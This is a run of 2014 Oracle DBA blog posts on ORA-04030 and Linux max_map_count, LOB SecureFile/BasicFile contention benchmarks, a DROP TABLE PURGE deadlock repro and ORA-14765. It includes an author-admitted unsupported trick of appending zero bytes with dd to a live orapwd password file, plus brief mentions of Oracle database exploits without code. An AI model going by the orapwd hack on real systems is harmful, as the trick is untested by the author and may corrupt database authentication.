impdp: ORA-04030: out of process memory when trying to allocate 4088 bytes (PLS CGA hp,pdzgM64_New_Link)

November 14th, 2014

Even on Oracle 11.2.0.4.x there seems to be problem with “ORA-04030: out of process memory when trying to allocate 4088 bytes (PLS CGA hp,pdzgM64_New_Link)”. I’ve just hit it during DataPump import. Alert log states something like this:

ORA-04030: out of process memory when trying to allocate 1052696 bytes (pga heap,log read buffer)
ORA-04030: out of process memory when trying to allocate 7438704 bytes (pga heap,kgh stack)
ORA-04030: out of process memory when trying to allocate 4088 bytes (PLS CGA hp,pdzgM64_New_Link)
Dumping diagnostic data in directory=[cdmp_20141106193106], requested by (instance=2, osid=4893 (DW00)), summary=[incident=240603]

Detailed incident trace shows:

mmap(offset=207282176, len=8192) failed with errno=12 for the file ora_dw00_DBSIDNAME3
[..]
*** 2014-11-06 19:48:31.300
OPIRIP: Uncaught error 27102. Error stack:
ORA-27102: out of memory
Linux-x86_64 Error: 12: Cannot allocate memory
Additional information: 108
Additional information: 4521984
ORA-00448: normal completion of background process
ORA-31671: Worker process DW00 had an unhandled exception.
ORA-04030: out of process memory when trying to allocate 16048 bytes (session heap,kuxLpxAlloc)
ORA-06512: at "SYS.KUPW$WORKER", line 1887

/usr/include/asm-generic/errno-base.h states that 12 is exactly ENOMEM error code. Investigation for mmap() syscall shows that ENOMEM stands for “No memory is available, or the process’s maximum number of mappings would have been exceeded.”
In Linux apparently there seems to be max_map_count limit defined as follows:

The max_map_count file allows for the restriction of the number of VMAs (Virtual Memory Areas) that a particular process can own. A Virtual Memory Area is a contiguous area of virtual address space. These areas are created during the life of the process when the program attempts to memory map a file, links to a shared memory segment, or allocates heap space. Tuning this value limits the amount of these VMAs that a process can own. Limiting the amount of VMAs a process can own can lead to problematic application behavior because the system will return out of memory errors when a process reaches its VMA limit but can free up lowmem for other kernel uses. If your system is running low on memory in the NORMAL zone, then lowering this value will help free up memory for kernel use.

This seems to be simple check in http://lxr.free-electrons.com/source/mm/mmap.c and seemed to be switched to dynamic sysctl value at times of 2.6.5 kernels (https://www.kernel.org/pub/linux/kernel/people/akpm/patches/2.6/2.6.5-rc3/2.6.5-rc3-mm3/broken-out/max_map_count-sysctl.patch) in do_mmap_pgoff() function.

Simple workaround of increasing this value via sysctl works like a harm. The interesting fact is that oracle-validated RPM does not change this value, but it could.

11.2.0.4.x, 12.1: Bug Alert 19384287 for function based indexes together with NVL()

August 17th, 2014

19384287 : WRONG NUMBER OF ROWS RETURNED ON FIRST EXECUTION

New exploits for recent Oracle DB releases…

June 22nd, 2014

Exploit probably for CVE-2013-5858 (according to Jan 2014 CPU’s Oracle Database Server Risk Matrix ) has been revealed in blog posts Is your database secure? Are you sure? Are you *really* sure? and here Major Data Exploit Patched by January 2014′s CPU

http://www.security-explorations.com/en/SE-2014-01-press.html – internal Oracle RDMS JRE is vulnerable, CREATE SESSION privilege is enough (so with just account without even CREATE TABLE one can takeover DBA privs), not fixed yet (just sent to Oracle), no workaround given yet; I think it is just matter of time once reproduces this… :)

Part 5: Oracle SecureFile LOB is better than BasicFile, isn’t it?

May 9th, 2014

In this part I’ll try to discuss one of the biggest performance problem with BasicFile LOBs – enq HW contention (wait event that belongs to “configuration” class). Often it may be observed on systems with concurrent INSERTs into BasicFile LOBs with data bigger tan ~3960 bytes (or with LOBs having DISABLED STORAGE ON ROW), it probably is common name for things related to space allocation (allocating/formating the next extent for LOBSEGMENT itself OR looking for free space and reclaiming it). More research typically ends up in reading the following engineering notes in Metalink:

  • LOB HWM CONTENTION :Using AWR Reports to Identify the Problem; Confirm and Verify the Fix (Doc ID 837883.1)
  • Bug 9801919 “enq: HW – contention” against segments that add an extent frequently during high concurrency
  • ‘enq HW – contention’ For Busy LOB Segment (Doc ID 740075.1)
  • BUG:4867884 LOB HW LOCK CONTENTION WITH SPACE RECLAIMATION
  • Bug 6376915 HW enqueue contention for ASSM LOB segments
  • Bug 7319120 HW contention for BasicFile LOBs – special workaround

Especially in the last Bug 7319120, the workaround is stated as “The preferred option for such contention on basicfile LOBs is to migrate the LOBS to Securefiles in RDBMS 11g or later. Securefile LOBs have been designed for better concurrency“, but as I’ve presented in earlier posts, it is not beatiful as it sounds (huge problems shown in previous posts with wasting space with SecureFiles on early 11.2.0.2.x releases and supprisgnly the same on at least <= 11.2.0.4.2 as of writing). Most of the remaining bugs are already fixed starting 11.2.0.3.0, but as stated by Oracle SecureFiles are "the way forward".

To best of my knowledge typical solutions to "enq HW - contention" include usually one of the following:

  1. properly setting LOB option cache vs nocache (default) and tuning I/O – the enq HW for LOBs seems to affected by storage operations as it will be shown later
  2. proper (hash) partitioning scheme on the affected table/LOB to split contention
  3. altering LOB option chunksize (often increasing the default 8k to something like 16k/32k gives some minimal better results – but this is very workload specific)
  4. setting event 44951

Test env specification
Armed with the knowledge I’ve decided to really test that interesting event for my specific artificial workload. By this i mean version 11.2.0.3.8, BasicFile LOB, NOCACHE, pctversion 0, lobs sizes between 6000 … 10000, 7 concurrent INSERT and DELETE jobs preceeded by prefilling LOBs and then DELETing — to simulate in non-ideal clean conditions for table (ab)used as queue. DB was in NOARCHIVELOG and flashback was disabled. The only difference was storage being RAID1 of just 2xSAS 15k RPM drives (shared between data and redo) – instead of ramdisk (I’ve needed that I/O latency for enq HW to become visible in Top5),

HW contention root cause
The even more interesting fact is that INSERTs into LOB (with related LOB extent allocation) is masked by enq HW contention which (when you look via V$wait_chains) is actually waiting for “db file sequential read” :

CHAIN_SIGNATURE                                    WHO             WAIT_EVENT_TEXT              BLOCKED_BY              P1 P1_TEXT                 P2 P2_TEXT                 P3 P3_TEXT
-------------------------------------------------- --------------- ---------------------------- --------------- ---------- --------------- ---------- --------------- ---------- ---------------
'db file sequential read'<='enq: HW - contention'  129,571         enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block
'db file sequential read'<='enq: HW - contention'  160,25          db file sequential read      ,                        3 file#                 4514 block#                   1 blocks
'db file sequential read'<='enq: HW - contention'  6,7             enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block
'db file sequential read'<='enq: HW - contention'  33,9            enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block
'db file sequential read'<='enq: HW - contention'  65,9            enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block
'db file sequential read'<='enq: HW - contention'  190,13          enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block
'db file sequential read'<='enq: HW - contention'  223,9           enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block

In the above case 6 sessions were waiting with enq TX contetnion (looking for free space for INSERT) for 7th session (sid=160,serial#=25) actually searching for space/reclaiming the space to finish – and actually the 7th session was doing single block (8kB) physical DB I/O read. The Top5 session look similiar to this:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:24:54.463960000 

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
enq: HW - contention                 62,717         918     15   32.2 Configurat
direct path write                    93,156         277      3    9.7 User I/O
db file sequential read              64,995         199      3    7.0 User I/O
DB CPU                                               91           3.2
buffer busy waits                    26,578           1      0     .0 Concurrenc

and most useful for us statistics (look at physical direct writes for lobs):

Statistic                                     Total     per Second     per Trans
-------------------------------- ------------------ -------------- -------------
[..]
lob reads                                    63,000          188.8           1.0
lob writes                                  315,000          943.7           5.0
lob writes unaligned                        314,990          943.7           5.0
physical read IO requests                    64,851          194.3           1.0
physical read bytes                     531,267,584    1,591,684.2       8,428.1
physical read total IO requests              65,656          196.7           1.0
physical read total bytes               544,384,000    1,630,981.2       8,636.2
physical read total multi block                   0            0.0           0.0
physical reads                               64,852          194.3           1.0
physical reads cache                            558            1.7           0.0
physical reads cache prefetch                     1            0.0           0.0
physical reads direct                        64,294          192.6           1.0
physical reads direct temporary                   0            0.0           0.0
physical write IO requests                  105,628          316.5           1.7
physical write bytes                  1,036,320,768    3,104,829.8      16,440.4
physical write total IO requests            170,303          510.2           2.7
physical write total bytes            1,339,469,824    4,013,068.1      21,249.6
physical write total multi block                 43            0.1           0.0
physical writes                             126,504          379.0           2.0
physical writes direct                      125,324          375.5           2.0
physical writes direct (lob)                125,316          375.5           2.0
physical writes from cache                    1,180            3.5           0.0
physical writes non checkpoint              126,504          379.0           2.0
[..]

Below are data after changing the LOB to CACHE, which had resulted in drastic reduction of enq HW contention (as the dependend I/O is faster because it is usually cached) and V$WAIT_CHAINS results in many for example wait chains like those(notice lack of “-> db file sequential read”):

  • ‘log file parallel write’<='log buffer space'<='buffer busy waits'
  • ‘log file parallel write’<='log buffer space'
  • ‘enq: HW – contention’<='enq: HW - contention'

while the Top5 results in different stuff (the main bottleneck moved to the REDO subsystem now):

ELAPSED
---------------------------------------------------------------------------
+000000000 00:06:29.795479000 

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
log buffer space                      1,542         116     75   15.6 Configurat
enq: HW - contention                 58,609         110      2   14.8 Configurat
buffer busy waits                   125,436          99      1   13.3 Concurrenc
DB CPU                                               91          12.3
log file switch (checkpoint in            6          10   1620    1.3 Configurat
Statistic                                     Total     per Second     per Trans
-------------------------------- ------------------ -------------- -------------
[..]
lob reads                                    63,000          347.3           1.0
lob writes                                  315,009        1,736.4           5.0
physical read IO requests                       629            3.5           0.0
physical read bytes                       5,619,712       30,976.6          89.1
physical read total IO requests               1,629            9.0           0.0
physical read total bytes                21,804,032      120,186.7         345.8
physical read total multi block                   0            0.0           0.0
physical reads                                  686            3.8           0.0
physical reads cache                            661            3.6           0.0
physical reads cache prefetch                    57            0.3           0.0
physical reads direct                            25            0.1           0.0
physical reads direct temporary                   0            0.0           0.0
physical write IO requests                   16,462           90.7           0.3
physical write bytes                    234,405,888    1,292,076.2       3,718.0
physical write total IO requests             19,116          105.4           0.3
physical write total bytes            1,399,786,496    7,715,808.2      22,202.6
physical write total multi block              2,341           12.9           0.0
physical writes                              28,614          157.7           0.5
physical writes direct                           25            0.1           0.0
physical writes direct (lob)                      0            0.0           0.0
physical writes from cache                   28,589          157.6           0.5
physical writes non checkpoint               16,153           89.0           0.3
[..]

So in this case changing to CACHE results in reducing the work from 7 jobs from almost 25mins to 6 mins. Also you might notice a rather huge decrease of direct physical random writes which is almost always excellent results for most disk based systems (those blocks would be certianly flushed out by DBWR using much more optimized/sequential writes).

The mysterious event 44591
The mentioned event is described as “causes ASSM LOB space to batch up reclaim instead of just reclaiming the requested/required number of LOB chunks. To enable this fix, set event 44951 to the maximum number of chunks that you would like to have reclaimed per attempt. The maximum allowed is 1024. Anything larger becomes 1024. However, if the requested amount of space is larger than the event’s value, the reclaim will be for the requested amount of space.
It is interesting that several years ago people complained when migrated LOBs from MSSM to ASSM and voila and in different source we find “With Manual Segment Space Management, this value cannot be altered and is fixed at 128.“. Somewhere else it is written: “The fix for this problem introduces a *mandatory event* which must be set in order for the ASSM architectural change leading to more efficient allocation of LOB chunks during high load and transaction contention when Extent allocation is needed. The event is *not* set even after you apply the patch.

So here are the results with NOCACHE LOB:

event44951 not set:

ELAPSED                                                                                                                                              ---------------------------------------------------------------------------
+000000000 00:21:57.406259000

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
enq: HW - contention                 62,591         787     13   39.3 Configurat
direct path write                    90,263         252      3   12.6 User I/O
db file sequential read              64,616         172      3    8.6 User I/O
DB CPU                                              111           5.6
buffer busy waits                    24,388           1      0     .0 Concurrenc

event44951 setTo 3:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:18:33.058539000  

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
enq: HW - contention                 41,254         585     14   47.3 Configurat
direct path write                    86,039         285      3   23.0 User I/O
db file sequential read              43,801         144      3   11.6 User I/O
DB CPU                                               88           7.1
buffer busy waits                    39,976           1      0     .1 Concurrenc

event44951 set to 16:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:22:31.832235000   

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
direct path write                   107,809         911      8   34.9 User I/O
db file sequential read              12,804         185     14    7.1 User I/O
enq: HW - contention                  3,376         177     52    6.8 Configurat
DB CPU                                               81           3.1
log file switch (private stran            4           1    323     .0 Configurat

event44951 set to 32:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:49:27.268629000   

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
direct path write                   111,440       1,435     13   24.5 User I/O
enq: HW - contention                  2,597       1,027    395   17.5 Configurat
db file sequential read              20,339         429     21    7.3 User I/O
DB CPU                                               79           1.4
log file switch (private stran            5           2    474     .0 Configurat

event44951 set to 512:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:38:45.176198000   

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
direct path write                   116,908       1,833     16   40.2 User I/O
db file sequential read              17,262         354     20    7.8 User I/O
DB CPU                                               78           1.7
enq: HW - contention                     23          64   2802    1.4 Configurat
log file switch (private stran            6           3    473     .1 Configurat

So apparently the most interesting result (for LOB reclamation) is in my case the one with event set to 3 (chunks). I could test more, but time for this research was the most limiting constraint. When tablespace and LOB are created by default this mean 8kB, so in this case this would mean 8kB*3=24kB of I/O per reclamation. Apparently the bigger the event level/property the more I/O work for the potential reclamation is being done by the session requiring more space, all of this is hidden under enq HW contention for LOB segment, but for *different sessions*. The results in CACHE LOB scenario with event set to properly tuned level would probably result in even more optimal processing time.

SUMMARY
My conclusion is that enq HW contention being in single “Configuration event class” visible in Grid/Cloud Control, is a little bit unfortunate, because it might be also related to the I/O storage performance and this can be even affected by current db cache contents (which would or NOT contain the affected LOBSEGMENT blocks required for reclamation if possible). The LRU cache might be of course function of time/workload, also the physical I/O from the DB itself might be served by SAN cache.

Other interesting sources/posts/discussions:

Part 4: Oracle SecureFile LOB is better than BasicFile, isn’t it?

May 5th, 2014

In part 3 we have shown that SecureFiles were having much lower space utilization (they reused space) on 11.2.0.3.8. I’ve wanted to try the same workload on 11.2.0.4.2 (also on ramdisks, same ammount of concurrent jobs performing INSERTs and DELETEs, same ammount of data/variables for loops), the results are more or less VERY interesting:

Click to see in better resolution

Clearly there is some regression when it comes down to MB used afterwards (at the end of test “SELECT count(1) FROM t_blob” returns just 21 rows! so you really shouldn’t have ~700MB lost). The collected AWR snapshots also reveal lack of high “buffer busy waits” on 11.2.0.4.2 for securefiles when they were present on 11.2.0.3.8. AWR 11.2.0.3.8 is below:

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
DB CPU                                              412          41.8
buffer busy waits                   415,575         299      1   30.4 Concurrenc
latch: cache buffers chains          39,045           2      0     .2 Concurrenc
latch free                            3,906           1      0     .1 Other
latch: enqueue hash chains            5,658           0      0     .0 Other

While the new/broken 11.2.0.4.2 stats are here:

Top 10 Foreground Events by Total Wait Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                            Tota    Wait   % DB
Event                                 Waits Time Avg(ms)   time Wait Class
------------------------------ ------------ ---- ------- ------ ----------
DB CPU                                        59           85.9
enq: TX - contention                    198  2.3      11    3.3 Other
buffer busy waits                    22,290  1.4       0    2.0 Concurrenc
local write wait                        292    1       3    1.4 User I/O
latch: object queue header ope          734   .2       0     .3 Other
latch: cache buffers chains           4,161   .1       0     .2 Concurrenc

As been metnioned before I/O has been elimiated by using ram disk (with filesystem_options=NONE due to the lack of proper O_DIRECT support on tmpfs). Much lower CPU utilization (412s to 59s) is very interesting, but as you can see this comes at price. Even more interesting is the old BASIC FILE AWR report on 11.2.0.4.2 :

Top 10 Foreground Events by Total Wait Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                            Tota    Wait   % DB
Event                                 Waits Time Avg(ms)   time Wait Class
------------------------------ ------------ ---- ------- ------ ----------
DB CPU                                      34.8           94.4
log file switch (checkpoint in            6  1.7     275    4.5 Configurat
buffer busy waits                    18,247   .4       0    1.1 Concurrenc
latch: cache buffers chains           4,617   .1       0     .2 Concurrenc
log file switch completion               16   .1       4     .2 Configurat
enq: TX - index contention              246    0       0     .1 Concurrenc

as it shows that BASIC FILEs are faster on CPUs for this particular workload when you completley eliminate I/O ;)

Part 3: Oracle SecureFile LOB is better than BasicFile, isn’t it?

April 24th, 2014

OK, so far in our previous parts/tests regarding Oracle LOBs we had:

  • part 1 – showing how SecureFiles are fairly superior on DB version 11.2.0.3.5 against BasicFiles in terms of space consumed and elapsed processing times when processing rather very small rows (most of them inline)
  • part 2 – showing how buggy SecureFiles were as a new feature, and actually how much space they actually wasted (on some legacy version 11.2.0.2.3)

Part 3 is going to focus on showing which is better for storing rows/LOBs that are too big to fit into row/table segment (~3900 bytes limit) and must be technically stored in separate LOB segment. The enviorniment is very similiar to the one from Part 1, basically OLTP, 4 concurrent jobs doing INSERTs to single non-partitioned table in PL/SQL loop doing INSERT LOB + DELETE LOB with ID-16 (moving window for each job), DB version is on 11.2.0.3.8, LOB chunk size is 8k, tablespace block size is also 8k, LOB setting is to perform CACHING. The storage underneath the DB is on ram disk (tmpfs to be exact), every time tablespace is dropped and recreated, everything is automated, including AWR snapshot collections. The main difference is that now we are using a much larger LOB sizes (over 4k to be exact) *AND* we changed workload to now prefill the table and LOB with garbage data, then delete it without coallescing the LOB segment itself. The last statement as you will see is ciritical , and shows typical usage pattern where data is removed (e.g. queues).

The results are below, first time elapsed BasicFile vs SecureFile:

Second, space efficency:

As you can simply see – the overall performance benefit from BasicFiles – causes huge storage waste. Also workload profile in this particular test run is much different between SecureFiles and BasicFiles , the best image is the difference in AWR snapshots for the Top 5 events for workload generating between 6k and 12k LOBs:

Click to see more details

Later analysis reveals that majority of “buffer busy waits” are spent on “free list” managment itself. Armed with this knowledge (11.2.0.3.8, securefile LOBs, buffer busy waits, free lists) we can start looking for more information, and we find a nice horror stories:

Summary:
At least on 11.2.0.3.8 SecureFile LOBs are still not working as fast as BasicFile but with added benefit of reusing space (much better than on some old PSUs e.g. 11.2.0.2.3). One can hit an extreme “buffer busy waits” on SecureFile which might require rebuilding the table with hidden parameter. It is written that this is fixed in 11.2.0.4.x releases. In Part 4 or Part 5 I’m going to see how 11.2.0.4.x behaves under the identical workload.

-J.

Bug/ORA-00060 deadlock during concurrent Drop Table (purge) and INSERT

March 24th, 2014

I’ve just found a rather new and not known bug during analysis for one of hangs in production system. This research ended up in full reproducible test case against the following Oracle versions on x86_64:

  • 11.2.0.3.8
  • 11.2.0.4.0
  • 12.1.0.1.0

First, let’s prepare the experimental schema to trigger this bug, we create TRANS table and the CHILD one, the target objective is to drop CHILD table from the system to release space:

drop table trans CASCADE CONSTRAINTS purge;
drop table child CASCADE CONSTRAINTS purge;
drop sequence trans_seq;
drop sequence child_seq;

CREATE TABLE TRANS (
  ID NUMBER(10,0) NOT NULL PRIMARY KEY,
  CDATE DATE NOT NULL,
  TXT VARCHAR2(64)
) PARTITION BY RANGE (cdate) INTERVAL (NUMTOYMINTERVAL(1,'MONTH'))
(
   PARTITION p1 values LESS THAN (TO_DATE('01-NOV-2010','DD-MON-YYYY'))
);

CREATE TABLE CHILD (
  CHILD_ID NUMBER(10,0) NOT NULL PRIMARY KEY,
  TRANS_ID NUMBER(10,0) NOT NULL ENABLE,
  TXT VARCHAR2(64),
  CONSTRAINT "TRANS_ID_FK" FOREIGN KEY (TRANS_ID) REFERENCES TRANS (ID) ENABLE
);

create sequence trans_seq start with 1 increment by 1 cache 1000;
create sequence child_seq start with 269282 increment by 1 cache 1000;

create or replace procedure generate_load as
  i number;
begin
  for i in 1 .. 50000 loop
    insert into trans (id, cdate) values (trans_seq.nextval, to_date(trunc(sysdate-i)));
    commit write wait;
  end loop;
end;
/

exec generate_load;

-- load child with some vaules from parent (trans)
insert into child (child_id, trans_id) select child_seq.nextval, id from trans;
commit;

The trick is that CHILD has referential constraint to the TRANS table. Additional trick is that there are many (3-4) concurrent sessions doing concurrent simple INSERTs to that table followed immediately by COMMIT WRITE WAIT in PL/SQL loop. OK so let’s start our generator:

[oracle@t10050 fk_drop_table_locks]$ ./gen.sh
Mon Mar 24 14:44:50 CET 2014
Launching 3 workers with load.sql
...waiting to finish

When we attempt now to drop our CHILD table using this (what has been really performed by production DBA some time ago in our case):

alter session set ddl_lock_timeout=15;
drop table child purge;

In the experiment we have end up in INSERT sessions throwing famous ORA-00060 errors. You might wonder

BEGIN generate_load; END;
BEGIN generate_load; END;

*
*
ERROR at line 1:
ERROR at line 1:
ORA-00060: deadlock detected while waiting for resource
ORA-00060: deadlock detected while waiting for resource
ORA-06512: at "DBA1.GENERATE_LOAD", line 5
ORA-06512: at "DBA1.GENERATE_LOAD", line 5
ORA-06512: at line 1
ORA-06512: at line 1

Elapsed: 00:00:15.06
Elapsed: 00:00:15.06
BEGIN generate_load; END;

*
ERROR at line 1:
ORA-00060: deadlock detected while waiting for resource
ORA-06512: at "DBA1.GENERATE_LOAD", line 5
ORA-06512: at line 1

Elapsed: 00:00:15.10

Of course alert log will be full of deadlock errors and the sample single session deadlock graph looks similiar:

*** 2014-03-24 14:25:23.056
DEADLOCK DETECTED ( ORA-00060 )

[Transaction Deadlock]

The following deadlock is not an ORACLE error. It is a
deadlock due to user error in the design of an application
or from issuing incorrect ad-hoc SQL. The following
information may aid in determining the deadlock:

Deadlock graph:
                       ---------Blocker(s)--------  ---------Waiter(s)---------
Resource Name          process session holds waits  process session holds waits
TM-0000a079-00000000        20     138    SX             24       6           S
TM-0000a07c-00000000        24       6     X             20     138          SX

session 138: DID 0001-0014-00000BF2     session 6: DID 0001-0018-00000055
session 6: DID 0001-0018-00000055       session 138: DID 0001-0014-00000BF2 

Rows waited on:
  Session 138: obj - rowid = 0000A07C - AAAAAAAAAAAAAAAAAA
  (dictionary objn - 41084, file - 0, block - 0, slot - 0)
  Session 6: obj - rowid = 0000A079 - AAAAAAAAAAAAAAAAAA
  (dictionary objn - 41081, file - 0, block - 0, slot - 0)

From this we can say that two sessions {138,6} endup in rivilaization for single two TM enqueues but in incompatibile way for two tables. Session 138 was holding SX lock on TM enqueue for table 0000A079 (TRANS) – i.e. was protecting the table in shared exclusvie mode, because wanted to insert – and in parallel to that, session 6 was holding X lock on TM enqueue for table 0000a07c (CHILD) – i.e. was holding exclusive access to whole table , so it was that tried to DROP it. In the next processing cycles:

  • session 6 (the one with DROP TABLE PURGE) tried to accquire shared lock S on table TRANS due tue to FK constraint, and started waiting for it (S and SX are not compatibile according to MetaLink note Id Detecting and Resolving Locking Conflicts and Ora-00060 errors (Doc ID 15476.1))
  • session 138 (the one doing INSERT at the time) tried to accquire SX on the enqueue TM for table CHILD, but couldnt get it as CHILD has been eXclusivley locked by session 6
  • in the several seconds automatic DeadLock detection kicks in and kills sessions performing INSERTs causing downtime/error for application

Upon further investigation together with my DBA coworker Andrzej Nowicki and short trials and errors today, we’ve came to the conclusion that the main culprint of this error is the PURGE clause of the DROP TABLE statement. This has several interesting repercusions:

  • “DROP TABLE X PURGE” vs “DROP TABLE X” are technically two different things and the former actually does NOT results in bug.
  • Oracle parameter responsible for recyclebin affects whether “DROP TABLE X” results really in “DROP TABLE X PURGE”
  • This case is very similiar to the Bug 11693365: Concurrent Drop table and Select on Reference constraint table hangs (deadlock), however that one is stated to be fixed 12.1.0.1 (Base Release) and 11.2.0.3 (Server Patch Set), however the mentioned here bug is NOT.
  • The workarounds for bug 11693365 seem to also help here (“Disable and drop all the referential integrity constraints before dropping the child table.
    eg: alter table disable constraint ; / alter table drop constraint ; /drop table cascade constraints purge;”)

ORA-14765: when CREATE INDEX ONLINE is not really online…

March 14th, 2014

Several days ago we’ve hit in our production application an the interesting new (to me at least) Oracle error “ORA-14765: Cannot create a partition while doing a create index”. It wouldn’t be strange if it wouldn’t happen during an CREATE INDEX ONLINE operation, so therefore it indicates that ONLINE index creation is not really an ONLINE operation (sic!).

Note1: you cannot test it in SYS schema, as the defered segment creation feature on partitioned table seems to be not working for SYS (or SYSTEM tablespace) as it is dedicated for Oracle dictionary purposes only. Seems to me that this is similiar story to the enhaced-checksums always enabled for SYSTEM tablespace (hidden paramter _db_always_check_system_ts which stands for “Always perform block check and checksum for System tablespace”) etc.

Note2: the key in order to get the error is to have parameter deferred_segment_creation set to TRUE, which is pretty recommended if you want to avoid space waste, starting with 11.2g, as it allocates at minimum 8MB initial extent per (sub)partition segment.

Note3: tested only on 11.2.0.3.6 and 11.2.0.3.8.

After a little playing here are the steps to reproduce it:

DBA1@test3> create table t1 (
    id number primary key,
    ts	TIMESTAMP,
    txt varchar2(64)
) partition by range (ts)  interval (NUMTOYMINTERVAL(1, 'MONTH'))
(
  partition p1 values less than (TO_DATE('01.01.2000', 'DD.MM.YYYY')),
  partition p2000_02 values less than (TO_DATE('01.02.2000', 'DD.MM.YYYY')),
  partition p2000_03 values less than (TO_DATE('01.03.2000', 'DD.MM.YYYY')),
  partition p2000_04 values less than (TO_DATE('01.04.2000', 'DD.MM.YYYY')),
  partition p2000_05 values less than (TO_DATE('01.05.2000', 'DD.MM.YYYY')),
  partition p2000_06 values less than (TO_DATE('01.06.2000', 'DD.MM.YYYY'))
); 

Table created.

DBA1@test3> select table_name, segment_created from dba_tables where table_name='T1';

TABLE_NAME                     SEG
------------------------------ ---
T1                             N/A

DBA1@test3> select partition_name, segment_created from dba_tab_partitions where table_name='T1';

PARTITION_NAME                 SEGM
------------------------------ ----
P1                             NO
P2000_02                       NO
P2000_03                       NO
P2000_04                       NO
P2000_05                       NO
P2000_06                       NO

6 rows selected.

DBA1@test3>

Now add a very large single current partition that will take some time :

DBA1@test3> insert  /*+ APPEND NOLOGGING */ into t1 (id, ts, txt) SELECT level, sysdate, 'blah' FROM dual CONNECT BY LEVEL <= 2500000;

2500000 rows created.

DBA1@test3> commit;

Commit complete.

DBA1@test3>

Actually so far we have partition with segment_size approximatly of ~73MB in case of 8kB db blocks.

DBA1@test3> select p.partition_name, p.segment_created, s.bytes/1024 kb from dba_tab_partitions p left join dba_segments s on (p.partition_name=s.partition_name and p.table_name=s.segment_name) where p.table_name='T1' order by 2,1;

PARTITION_NAME                 SEGM         KB
------------------------------ ---- ----------
P1                             NO
P2000_02                       NO
P2000_03                       NO
P2000_04                       NO
P2000_05                       NO
P2000_06                       NO
SYS_P17066                     YES       73728

7 rows selected.

Now we start building online local index in our 1st session using “create index t1_i1 on t1 (ts, txt) local online”, immedietly followed by an attempt to insert single row into one of P2000_xx partition (which are without inititalized backing them segment at this point):

DBA1@test3> insert into t1 (id, ts, txt) values (3500000, TO_DATE('02.04.2000', 'DD.MM.YYYY'), 'testtesttest');
insert into t1 (id, ts, txt) values (3500000, TO_DATE('02.04.2000', 'DD.MM.YYYY'), 'testtesttest')
            *
ERROR at line 1:
ORA-14765: Cannot create a partition while doing a create index

DBA1@test3>

Summary: CREATE INDEX ONLINE is not fully compatibile with sessions performing DML transaction against (sub)partitions that doesn’t come with pre-allocated segments. There seems to be very likley possibility to run into ORA-14765 for Oracle transaction systems especially creating numerous automatically managed subpartitions based on some template (like Interval Range partitions that are subpartitioned by ID). Of course you may want to avoid defered segment creation (and sacrifise a lot of storage space) or live with the risks of hitting those errors during building indexes (hopefully application might just retry at later stage).

A new completley unsupported way of increasing ORAPWD entries

March 14th, 2014

FYI, i’ve just “invented” a completley new way of increasing capacity of orapwd files online that does not require knowing the SYS password (this is required once you hit ORA-1996, after trying to grant addiitonal SYSDBA). As you probably know there is hard limit of entries set when creating new orapw file and in addition it requires changing SYS password, apparently this seems to work (TM) but dont try this at home or any production system:

[oracle@t10050 dbs]$ cp orapwdtest4  orapwdtest4.old # make backup
[oracle@t10050 dbs]$ ls -l orapwdtes4 # save the filesize in bytes as SIZE1
[oracle@t10050 dbs]$ orapwd file=/tmp/remove entries=20
Enter password for SYS: anything
[oracle@t10050 dbs]$ ls -l /tmp/remove # file size will be approx 3584 bytes on Linux x86_64, if you compare it to the default orapwd , you will realize it is bigger by 2048 bytes
[oracle@t10050 dbs]$ dd if=/dev/zero of=/tmp/empty.2k bs=1k count=2
[oracle@t10050 dbs]$ cat /tmp/empty.2k >> orapwdtest4

Done! Brief tests shows that it works and you can add more working SYSDBA accounts, removal works ok, but again DO NOT TRY IT ON PRODUCTION as the internal orapwd structure is unknown to me ;)

CVE-2013-1534: remote command execution on Oracle RAC (Grid Infrastructure >= 11.2.0.[23].0 till PSU/CPU Apr2013)

January 23rd, 2014

